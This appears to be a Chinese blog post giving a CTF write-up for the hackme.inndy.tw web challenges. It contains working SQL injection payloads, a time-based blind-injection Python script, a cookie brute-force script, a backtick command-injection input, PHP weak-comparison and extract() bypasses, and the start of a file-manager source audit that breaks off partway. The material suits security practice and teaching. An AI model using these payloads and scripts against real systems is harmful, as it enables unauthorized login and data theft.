
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Hackme-web | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Guestbook注入点挺多 insert标题处存在注入 11&#39; and sleep(3) and &#39;  即可验证成功 id地方也可以注入 1id&#x3D;-1 union select 1,2,3,(select group_concat(flag) from flag) --  思考了一下如何最快的通过注入拿到数据的方法，时间盲注那肯定是最慢的，还受网络影响…,不到最后还是别">
<meta property="og:type" content="article">
<meta property="og:title" content="Hackme-web">
<meta property="og:url" content="http://yoursite.com/2019/10/27/Hackme-web/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="Guestbook注入点挺多 insert标题处存在注入 11&#39; and sleep(3) and &#39;  即可验证成功 id地方也可以注入 1id&#x3D;-1 union select 1,2,3,(select group_concat(flag) from flag) --  思考了一下如何最快的通过注入拿到数据的方法，时间盲注那肯定是最慢的，还受网络影响…,不到最后还是别">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/22/KGedv4.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KUtDSO.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/24/KUtjhV.png">
<meta property="article:published_time" content="2019-10-27T08:41:49.000Z">
<meta property="article:modified_time" content="2019-10-27T08:42:50.000Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/10/22/KGedv4.png">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">心未死 战未败</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-Hackme-web" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/10/27/Hackme-web/" class="article-date">
  <time datetime="2019-10-27T08:41:49.000Z" itemprop="datePublished">2019-10-27</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Hackme-web
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="Guestbook"><a href="#Guestbook" class="headerlink" title="Guestbook"></a>Guestbook</h3><p>注入点挺多</p>
<p>insert标题处存在注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; and sleep(3) and &#39;</span><br></pre></td></tr></table></figure>

<p>即可验证成功</p>
<p>id地方也可以注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;-1 union select 1,2,3,(select group_concat(flag) from flag) --</span><br></pre></td></tr></table></figure>

<p>思考了一下如何最快的通过注入拿到数据的方法，时间盲注那肯定是最慢的，还受网络影响…,不到最后还是别时间盲注了吧</p>
<h3 id="Ping"><a href="#Ping" class="headerlink" title="Ping"></a>Ping</h3><p>没过滤掉危险的反引号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#96;nl f*&#96;&#x2F;&#x2F;通过sort也可以</span><br></pre></td></tr></table></figure>

<h3 id="Scoreboard"><a href="#Scoreboard" class="headerlink" title="Scoreboard"></a>Scoreboard</h3><p>严重吐槽scoreboard和homepage两个题…..累不累啊..</p>
<h3 id="login-as-admin-0"><a href="#login-as-admin-0" class="headerlink" title="login as admin 0"></a>login as admin 0</h3><p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe_filter</span><span class="params">($str)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $strl = strtolower($str);</span><br><span class="line">    <span class="keyword">if</span> (strstr($strl, <span class="string">'or 1=1'</span>) || strstr($strl, <span class="string">'drop'</span>) ||</span><br><span class="line">        strstr($strl, <span class="string">'update'</span>) || strstr($strl, <span class="string">'delete'</span>)</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> str_replace(<span class="string">"'"</span>, <span class="string">"\\'"</span>, $str);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_POST = array_map(safe_filter, $_POST);</span><br><span class="line"></span><br><span class="line">$user = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// connect to database</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_POST[<span class="string">'name'</span>]) &amp;&amp; !<span class="keyword">empty</span>($_POST[<span class="string">'password'</span>])) &#123;</span><br><span class="line">    $connection_string = sprintf(<span class="string">'mysql:host=%s;dbname=%s;charset=utf8mb4'</span>, DB_HOST, DB_NAME);</span><br><span class="line">    $db = <span class="keyword">new</span> PDO($connection_string, DB_USER, DB_PASS);</span><br><span class="line">    $sql = sprintf(<span class="string">"SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'"</span>,</span><br><span class="line">        $_POST[<span class="string">'name'</span>],</span><br><span class="line">        $_POST[<span class="string">'password'</span>]</span><br><span class="line">    );</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        $query = $db-&gt;query($sql);</span><br><span class="line">        <span class="keyword">if</span>($query) &#123;</span><br><span class="line">            $user = $query-&gt;fetchObject();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            $user = <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span>(<span class="keyword">Exception</span> $e) &#123;</span><br><span class="line">        $user = <span class="keyword">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>算是个脑筋急转弯吧，开始通过payload进去了，发现是guest，那可能admin在id为2的那条</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload:admin\&#39; or is_admin&#x3D;1#</span><br><span class="line"> &#x2F;&#x2F; admin\&#39; or id&#x3D;2#</span><br></pre></td></tr></table></figure>

<h3 id="login-as-admin-0-1"><a href="#login-as-admin-0-1" class="headerlink" title="login as admin 0.1"></a>login as admin 0.1</h3><p>可以堆叠加盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">url=<span class="string">"https://hackme.inndy.tw/login0/"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">32</span>):</span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">		data=&#123;</span><br><span class="line">	<span class="string">'name'</span>:<span class="string">"admin\';select if(&#123;&#125;=ascii(mid((version()),&#123;&#125;,1)),sleep(3),1);"</span>.format(j,i),</span><br><span class="line">	<span class="string">'password'</span>:<span class="number">1</span></span><br><span class="line">&#125;</span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			r=requests.post(url,data=data,timeout=<span class="number">2.8</span>)</span><br><span class="line">		<span class="keyword">except</span>:</span><br><span class="line">			flag+=chr(j)</span><br><span class="line">			<span class="keyword">print</span> flag</span><br></pre></td></tr></table></figure>

<p>然而更好做法是union…</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin\&#39; union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#</span><br></pre></td></tr></table></figure>

<p>以后做题还是先试试union或者报错注入，毕竟时间盲注是最低效的操作。</p>
<h3 id="login-as-admin-1"><a href="#login-as-admin-1" class="headerlink" title="login as admin 1"></a>login as admin 1</h3><p>变了一下过滤，没什么太大用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe_filter</span><span class="params">($str)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $strl = strtolower($str);</span><br><span class="line">    <span class="keyword">if</span> (strstr($strl, <span class="string">' '</span>) || strstr($strl, <span class="string">'1=1'</span>) || strstr($strl, <span class="string">"''"</span>) ||</span><br><span class="line">        strstr($strl, <span class="string">'union select'</span>) || strstr($strl, <span class="string">'select '</span>)</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> str_replace(<span class="string">"'"</span>, <span class="string">"\\'"</span>, $str);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>没啥区别…</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin\&#39;&#x2F;**&#x2F;or&#x2F;**&#x2F;id&#x3D;2#</span><br></pre></td></tr></table></figure>

<h3 id="login-as-admin-1-2"><a href="#login-as-admin-1-2" class="headerlink" title="login as admin 1.2"></a>login as admin 1.2</h3><p>这个问题，上次盲注脚本就能解决，空格换一下就行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">flag&#x3D;&#39;&#39;</span><br><span class="line">url&#x3D;&quot;https:&#x2F;&#x2F;hackme.inndy.tw&#x2F;login0&#x2F;&quot;</span><br><span class="line">for i in range(1,32):</span><br><span class="line">	for j in range(33,127):</span><br><span class="line">		data&#x3D;&#123;</span><br><span class="line">	&#39;name&#39;:&quot;admin\&#39;;select&#x2F;**&#x2F;if(&#123;&#125;&#x3D;ascii(mid((version()),&#123;&#125;,1)),sleep(3),1);&quot;.format(j,i),</span><br><span class="line">	&#39;password&#39;:1</span><br><span class="line">&#125;</span><br><span class="line">		try:</span><br><span class="line">			r&#x3D;requests.post(url,data&#x3D;data,timeout&#x3D;2.8)</span><br><span class="line">		except:</span><br><span class="line">			flag+&#x3D;chr(j)</span><br><span class="line">			print flag</span><br></pre></td></tr></table></figure>

<h3 id="Login-as-Admin-3"><a href="#Login-as-Admin-3" class="headerlink" title="Login as Admin 3"></a>Login as Admin 3</h3><p>最开始有点想偏了…还想从json中注入新的admin字段…真是天真，后来发现hmac有弱类型比较，爆破一下cookie中的值就行了，发现9的时候正好可以。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">url=<span class="string">"https://hackme.inndy.tw/login3/"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">	data=<span class="string">'&#123;"sig":0,"data":"[\\"guest\\",'</span>+chr(i)+<span class="string">']"&#125;'</span></span><br><span class="line">	<span class="keyword">print</span> data</span><br><span class="line">	payload=base64.b64encode(data)</span><br><span class="line">	cookies=&#123;</span><br><span class="line">	<span class="string">'user'</span>:payload</span><br><span class="line">	&#125;</span><br><span class="line">	r=requests.get(url,cookies=cookies)</span><br><span class="line">	<span class="keyword">if</span> <span class="string">"You are admin"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">		<span class="keyword">print</span> r.text</span><br><span class="line"></span><br><span class="line"><span class="comment">###</span></span><br></pre></td></tr></table></figure>

<h3 id="Login-as-Admin4"><a href="#Login-as-Admin4" class="headerlink" title="Login as Admin4"></a>Login as Admin4</h3><p>应该算个逻辑漏洞</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_POST[<span class="string">'name'</span>] === <span class="string">'admin'</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>($_POST[<span class="string">'password'</span>] !== $password) &#123;</span><br><span class="line">        <span class="comment">// show failed message if you input wrong password</span></span><br><span class="line">        header(<span class="string">'Location: ./?failed=1'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们知道在location后如果不加exit()那么会执行header下面的代码</p>
<p>我们在用curl的时候不加-L是不会跟随跳转的，所以如果接着执行下面的代码的话，直接会bypass验证，拿到flag，所以header后一定要加个exit()啊</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https:&#x2F;&#x2F;hackme.inndy.tw&#x2F;login4&#x2F; -d &quot;name&#x3D;admin&quot;</span><br></pre></td></tr></table></figure>

<h3 id="Login-as-Admin6"><a href="#Login-as-Admin6" class="headerlink" title="Login as Admin6"></a>Login as Admin6</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">@error_reporting(E_ALL^E_NOTICE);</span><br><span class="line"><span class="keyword">require</span>(<span class="string">'config.php'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_GET[<span class="string">'show_source'</span>] === <span class="string">'1'</span>) &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$user = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// connect to database</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_POST[<span class="string">'data'</span>])) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        $data = json_decode($_POST[<span class="string">'data'</span>], <span class="keyword">true</span>);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (<span class="keyword">Exception</span> $e) &#123;</span><br><span class="line">        $data = [];</span><br><span class="line">    &#125;</span><br><span class="line">    extract($data);</span><br><span class="line">    <span class="keyword">if</span>($users[$username] &amp;&amp; strcmp($users[$username], $password) == <span class="number">0</span>) &#123;</span><br><span class="line">        $user = $username;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Payload如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//&#123;"username":"admin","users":&#123;"admin":"lihuaiqiu"&#125;,"password":"lihuaiqiu"&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$payload[<span class="string">'username'</span>]=<span class="string">'admin'</span>;</span><br><span class="line"></span><br><span class="line">$payload[<span class="string">'users'</span>][<span class="string">'admin'</span>]=<span class="string">'lihuaiqiu'</span>;</span><br><span class="line"></span><br><span class="line">$payload[<span class="string">'password'</span>]=<span class="string">'lihuaiqiu'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> json_encode($payload);</span><br></pre></td></tr></table></figure>

<h3 id="Login-as-Admin7"><a href="#Login-as-Admin7" class="headerlink" title="Login as Admin7"></a>Login as Admin7</h3><p>弱类型</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=QNKCDZO</span><br></pre></td></tr></table></figure>

<h3 id="dafuq-manager-1"><a href="#dafuq-manager-1" class="headerlink" title="dafuq-manager 1"></a>dafuq-manager 1</h3><p>这个系列的靶场我觉得挺有意思的，有种小小型cms的感觉吧，也学到了一些有趣的知识</p>
<p>第一关需要登陆guest找到flag</p>
<p>我们可以看到cookie里有一些有趣的东西，将cookie中的show_hidden改为yes拿到flag</p>
<h3 id="dafuq-manager-2"><a href="#dafuq-manager-2" class="headerlink" title="dafuq-manager 2"></a>dafuq-manager 2</h3><p>题目要求以admin登陆才可以拿到flag,并且给了源码，把源码下载下来开始审计</p>
<p>可以看到入口是一个switch（话说这代码写的看的人是真的难受…</p>
<p><strong>index.php中跟进case “admin”</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">"admin"</span>:</span><br><span class="line">    <span class="keyword">require</span> <span class="string">"./core/fun_admin.php"</span>;</span><br><span class="line">    show_admin($GLOBALS[<span class="string">"dir"</span>]);</span><br></pre></td></tr></table></figure>

<p><strong>fun_admin.php中跟进show_admin</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_admin</span><span class="params">($dir)</span> </span>&#123;</span><br><span class="line">    $pwd = (($GLOBALS[<span class="string">"permissions"</span>] &amp; <span class="number">2</span>) == <span class="number">2</span>);</span><br><span class="line">    $admin = (($GLOBALS[<span class="string">"permissions"</span>] &amp; <span class="number">4</span>) == <span class="number">4</span>);</span><br><span class="line">    <span class="keyword">if</span> (!$GLOBALS[<span class="string">"require_login"</span>]) show_error($GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"miscnofunc"</span>]);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($GLOBALS[<span class="string">'__GET'</span>][<span class="string">"action2"</span>])) $action2 = $GLOBALS[<span class="string">'__GET'</span>][<span class="string">"action2"</span>];</span><br><span class="line">    <span class="keyword">elseif</span> (<span class="keyword">isset</span>($GLOBALS[<span class="string">'__POST'</span>][<span class="string">"action2"</span>])) $action2 = $GLOBALS[<span class="string">'__POST'</span>][<span class="string">"action2"</span>];</span><br><span class="line">    <span class="keyword">else</span> $action2 = <span class="string">""</span>;</span><br><span class="line"><span class="comment">// admin所拥有的功能</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>当$GLOBALS[“permissions”]大于4，即可满足所有admin功能</p>
<p>可以看一下当前用户的permissons</p>
<p><strong>跟进fun_users.php中activate_user</strong></p>
<p>发现</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">activate_user</span><span class="params">($user, $pass)</span> </span>&#123;</span><br><span class="line">    $data = find_user($user, $pass);</span><br><span class="line">    <span class="keyword">if</span> ($data == <span class="keyword">NULL</span>) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    ...</span><br><span class="line">    $GLOBALS[<span class="string">"permissions"</span>] = $data[<span class="number">6</span>];</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>跟进find_user</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> &amp;<span class="title">find_user</span><span class="params">($user, $pass)</span> </span>&#123;</span><br><span class="line">    $cnt = count($GLOBALS[<span class="string">"users"</span>]);</span><br><span class="line">    <span class="keyword">for</span> ($i = <span class="number">0</span>;$i &lt; $cnt;++$i) &#123;</span><br><span class="line">        <span class="keyword">if</span> ($user == $GLOBALS[<span class="string">"users"</span>][$i][<span class="number">0</span>]) &#123;</span><br><span class="line">            <span class="keyword">if</span> ($pass == <span class="keyword">NULL</span> || ($pass == $GLOBALS[<span class="string">"users"</span>][$i][<span class="number">1</span>] &amp;&amp; $GLOBALS[<span class="string">"users"</span>][$i][<span class="number">7</span>])) &#123;</span><br><span class="line">                <span class="keyword">return</span> $GLOBALS[<span class="string">"users"</span>][$i];</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>跟进$GLOBALS[“users”]</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$GLOBALS[<span class="string">"users"</span>] = <span class="keyword">array</span>(</span><br><span class="line">    <span class="keyword">array</span>(<span class="string">"guest"</span>, <span class="string">"084e0343a0486ff05530df6c705c8bb4"</span>, <span class="string">"./data/guest"</span>, <span class="string">"https://game1.security.ntu.st/data/guest"</span>, <span class="number">0</span>, <span class="string">"^.ht"</span>, <span class="number">1</span>, <span class="number">1</span>),</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>其实我们最终得到的也就是这个数组，$data[6]=1,所以不满足admin功能的权限要求，可以思考一下，如果想要我们以admin登陆，会有哪几种方法呢，刚才跟进的时候会发现htusers.php是储存着用户信息的，第一种方法我们可以去读取题中的htuseres，第二种就是sql注入，第三种就是hash长度扩展攻击</p>
<p>思考一下这几种方法的可行性</p>
<ul>
<li>文件读取的话，本题恰好有下载功能，当然其他函数也可以读源码，比如file_get_contents,readfile,fopen之类的</li>
<li>sql注入…我连个select语句都没看到，应该不可能</li>
<li>hash长度扩展攻击，没有关键的代码出现，也不可能</li>
</ul>
<p>所以最终攻击点还是落在文件读取，我们可以去读题种的htusers.php来得到用户的信息，首先去看一下download功能，因为一般拿到源码都是通过download</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require_once</span> (<span class="string">'core/secure.php'</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">download_item</span><span class="params">($dir, $item)</span> </span>&#123;</span><br><span class="line">    $item = basename($item);</span><br><span class="line">    <span class="keyword">if</span> (($GLOBALS[<span class="string">"permissions"</span>] &amp; <span class="number">01</span>) != <span class="number">01</span>) show_error($GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"accessfunc"</span>]);</span><br><span class="line">    <span class="keyword">if</span> (!get_is_file($dir, $item)) show_error($item . <span class="string">": "</span> . $GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"fileexist"</span>]);</span><br><span class="line">    <span class="keyword">if</span> (!get_show_item($dir, $item)) show_error($item . <span class="string">": "</span> . $GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"accessfile"</span>]);</span><br><span class="line">    $abs_item = get_abs_item($dir, $item);</span><br><span class="line">    <span class="keyword">if</span> (!file_in_web($abs_item) || stristr($abs_item, <span class="string">'.php'</span>) || stristr($abs_item, <span class="string">'config'</span>)) show_error($item . <span class="string">": "</span> . $GLOBALS[<span class="string">"error_msg"</span>][<span class="string">"accessfile"</span>]);</span><br><span class="line">...</span><br><span class="line">    @readfile($abs_item);</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先跟进约束条件进行一些尝试</p>
<p>$GLOBALS[“permissions”] &amp; 01，我们身为guest还是很满足这个条件的</p>
<p>get_is_file函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_is_file</span><span class="params">($dir, $item)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> @is_file(get_abs_item($dir, $item));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><strong>跟进get_abs_item</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_abs_item</span><span class="params">($dir, $item)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> get_abs_dir($dir) . <span class="string">"/"</span> . $item;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_abs_dir</span><span class="params">($dir)</span> </span>&#123;</span><br><span class="line">    $abs_dir = $GLOBALS[<span class="string">"home_dir"</span>]; <span class="comment">//home_dir="data/guest"</span></span><br><span class="line">    <span class="keyword">if</span> ($dir != <span class="string">""</span>) $abs_dir.= <span class="string">"/"</span> . $dir;</span><br><span class="line">    <span class="keyword">return</span> $abs_dir;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

